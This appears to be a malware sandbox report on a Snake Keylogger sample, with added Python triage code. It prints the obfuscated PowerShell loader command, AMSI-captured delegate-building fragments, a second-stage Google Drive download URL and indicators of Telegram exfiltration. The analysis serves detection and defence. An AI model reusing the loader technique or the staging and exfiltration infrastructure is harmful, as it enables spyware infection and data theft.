Source: msiexec.exe, 00000009.00000002.2665789154.00000000230BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000009.00000002.2665789154.00000000230E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.000000002312B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000009.00000002.2653650551.00000000075D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000009.00000002.2653650551.00000000075D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
          Source: msiexec.exe, 00000009.00000002.2653650551.00000000075D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: msiexec.exe, 00000009.00000002.2665789154.000000002325F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.0000000023250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: msiexec.exe, 00000009.00000002.2665789154.000000002325A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: msiexec.exe, 00000009.00000002.2665789154.0000000023250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/p
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.8:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.8:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49728 version: TLS 1.2
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_00404FE4 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FE4
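          The network strings above line up with the signatures the report raises for the Snake Keylogger payload: a public-IP geolocation lookup against reallyfreegeoip.org/xml/<ip> (the "detect the country of the analysis system" signature), a second-stage pull from a Google Drive usercontent download URL, and a TLS session to 149.154.167.220 at the time the Telegram API signature fires. The Python below is an added triage example, not part of the Joe Sandbox report: it classifies constructed proxy-log lines against those indicators. The Drive file id and the geoip path are taken from the strings above; treating 149.154.167.220 as Telegram's API endpoint is an assumption drawn from the report's Telegram signature, the report itself does not name that host.

```python
"""Classify network indicators attributed to the Snake Keylogger payload in this
report (geolocation lookup, staged-payload download, Telegram exfiltration).
Added example, not part of the Joe Sandbox report. Log lines are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Observed in the report's memory strings: the payload queries
# reallyfreegeoip.org/xml/<public ip> and fetches a stage from a Google Drive
# "usercontent" download URL.
GEOIP_HOST = "reallyfreegeoip.org"
DRIVE_HOST = "drive.usercontent.google.com"
# Assumption: the TLS peer 149.154.167.220 seen in the report is Telegram's API
# endpoint; the report only states that the sample uses the Telegram API.
TELEGRAM_API_IPS = {"149.154.167.220"}

_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def classify_url(url):
    """Return a finding label for one URL, or None when it matches nothing."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host == GEOIP_HOST and parts.path.startswith("/xml/"):
        ip = parts.path[len("/xml/"):]
        # The victim's own public IP is appended to the path; keep it for the analyst.
        return "geoip-beacon:" + ip if _IPV4.match(ip) else "geoip-beacon"
    if host == DRIVE_HOST and parts.path == "/download":
        q = parse_qs(parts.query)
        if q.get("export") == ["download"] and q.get("id"):
            return "drive-stage-download:" + q["id"][0]
    return None


def classify_tls_peer(ip):
    """Flag a TLS peer only if it is on the (assumed) Telegram API list."""
    return "telegram-api-peer:" + ip if ip in TELEGRAM_API_IPS else None


# Constructed proxy-log lines: "<client> <method> <url>" or "<client> TLS <server_ip>".
SAMPLE_LOG = """\
192.168.2.8 GET https://drive.usercontent.google.com/download?id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI&export=download
192.168.2.8 GET https://reallyfreegeoip.org/xml/8.46.123.189
192.168.2.8 GET https://www.office.com/
192.168.2.8 TLS 149.154.167.220
192.168.2.8 TLS 142.250.184.238
"""


def scan_log(text):
    """Return (client, finding) pairs for every line that matches an indicator."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue  # malformed line, skip rather than guess
        client, kind, target = fields
        label = classify_tls_peer(target) if kind == "TLS" else classify_url(target)
        if label:
            findings.append((client, label))
    return findings


if __name__ == "__main__":
    for client, label in scan_log(SAMPLE_LOG):
        print(client, label)
```

          The office.com, google.com and duckduckgo.com strings in the same dumps are browser new-tab and search-provider defaults recovered while the payload harvested browser data; they are not contacted by the sample and the classifier deliberately ignores them.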

          System Summary

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\HVSU7GbA5N.exe (dropped file)
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Code function: 0_2_004030B6 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Code function: 0_2_00404823
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Code function: 0_2_00406197
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07D2C4DE
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_02D5D278
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_02D55370
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_02D5C146
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_02D5C738
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_02D5C468
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_02D5CA08
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_02D5E988
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_02D5CFA9
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_02D5CCD8
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_02D5A088
          Source: HVSU7GbA5N.exe, 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename deliberationens imporosity.exe4 vs HVSU7GbA5N.exe
          Source: HVSU7GbA5N.exe | Binary or memory string: OriginalFilename deliberationens imporosity.exe4 vs HVSU7GbA5N.exe
          Source: HVSU7GbA5N.exe.2.dr | Binary or memory string: OriginalFilename deliberationens imporosity.exe4 vs HVSU7GbA5N.exe
          Source: HVSU7GbA5N.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/11@5/5
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Code function: 0_2_004042B1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | File created: C:\Users\user\AppData\Local\Chillum19
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
          Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: NULL
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | File created: C:\Users\user\AppData\Local\Temp\nslFBE7.tmp
          Source: HVSU7GbA5N.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: HVSU7GbA5N.exe | ReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | File read: C:\Users\user\Desktop\HVSU7GbA5N.exe
          Source: unknown | Process created: C:\Users\user\Desktop\HVSU7GbA5N.exe "C:\Users\user\Desktop\HVSU7GbA5N.exe"
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: shfolder.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: riched20.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: usp10.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: msls31.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: textinputframework.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: coreuicomponents.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: wintypes.dll (3 times)
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: textshaping.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ucrtbase_clr0400.dll (2 times)
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasapi32.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasman.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rtutils.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dhcpcsvc.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: secur32.dll
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: HVSU7GbA5N.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: e.pdb0:lp source: powershell.exe, 00000002.00000002.2031388759.0000000008BC1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb53 source: powershell.exe, 00000002.00000002.2011151339.0000000003575000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: s\System.Core.pdbw,l source: powershell.exe, 00000002.00000002.2031388759.0000000008BC1000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara match | File source: 00000002.00000002.2032574742.000000000A644000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Glucosidically $Hydrodynamic $Fladblgene187), (Showboater @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Albarium = [AppDomain]::CurrentDomain.GetAssembli
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Paragrafrytterens)), $Syningshaller).DefineDynamicModule($Overbevisendes, $false).DefineType($ypperst, $Opgavest, [System.MulticastDel
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Code function: 0_2_00405EE8 GetModuleHandleA,LoadLibraryA,GetProcAddress
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04DCE9F8 push eax; mov dword ptr [esp], edx | 2_2_04DCEA0C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07D2A116 push ebx; retf | 2_2_07D2A11D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07D20FC4 push es; iretd | 2_2_07D20FC7
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07D2F58C push ecx; iretd | 2_2_07D2F58E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07D2F3D6 push ecx; iretd | 2_2_07D2F3E6
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_09A939C1 push 8BD38B50h; iretd | 2_2_09A939C6
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_09A905AC push edx; iretd | 2_2_09A905B8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_09A90459 push edx; iretd | 2_2_09A90475
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_09A9061F push 8BD68B50h; retf | 2_2_09A90627
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\HVSU7GbA5N.exe (dropped file)
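          Two PowerShell artefacts in this report are better matched on structure than on literal strings, because the variable names change per sample: the powershell.exe command line under System Summary (Get-Content -Raw of a staged .Gte file, a three-character SubString at a fixed offset, then dot-sourcing that substring with the file contents as its argument, which is how the loader reaches the "dynamic code loading" stage) and the two AMSI fragments above (a type derived from MulticastDelegate built through DefineDynamicAssembly/DefineDynamicModule/DefineType, then bound to a native function pointer with GetDelegateForFunctionPointer, so the script can call Win32 exports without Add-Type or a DllImport). The Python below is an added triage example, not code from the report or from the malware. The command line and the AMSI fragments are copied from the report; the staged-file contents are a constructed stand-in because the report does not disclose them; the "three of five markers" threshold is an arbitrary choice for illustration.

```python
"""Triage helpers for the two PowerShell artefacts in this report: the loader
command line that dot-sources a three-character substring of a staged file, and
the AMSI-captured script content that builds a delegate over a raw function
pointer. Added example, not code from the report or from the malware."""
import re

# Command line recorded in the report (process creation from HVSU7GbA5N.exe).
LOADER_CMDLINE = (
    "\"powershell.exe\" -windowstyle minimized \"$Delfisk=Get-Content -Raw "
    "'C:\\Users\\user\\AppData\\Local\\Chillum19\\rustiness\\attacheringens\\Sprngningen178.Gte';"
    "$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)\""
)

# Shape: $A = Get-Content -Raw '<file>'; $B = $A.SubString(<off>,<len>); .$B($A)
# Variable names are random per sample, so the backreferences tie the three
# statements together instead of matching any particular name.
_LOADER = re.compile(
    r"\$(?P<content>\w+)\s*=\s*Get-Content\s+-Raw\s+'(?P<path>[^']+)'\s*;\s*"
    r"\$(?P<cmd>\w+)\s*=\s*\$(?P=content)\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)\s*;\s*"
    r"[.&]\s*\$(?P=cmd)\s*\(\s*\$(?P=content)\s*\)",
    re.IGNORECASE,
)


def parse_loader_cmdline(cmdline):
    """Return {'path', 'offset', 'length'} when the command line has the
    Get-Content / SubString / dot-source shape, else None."""
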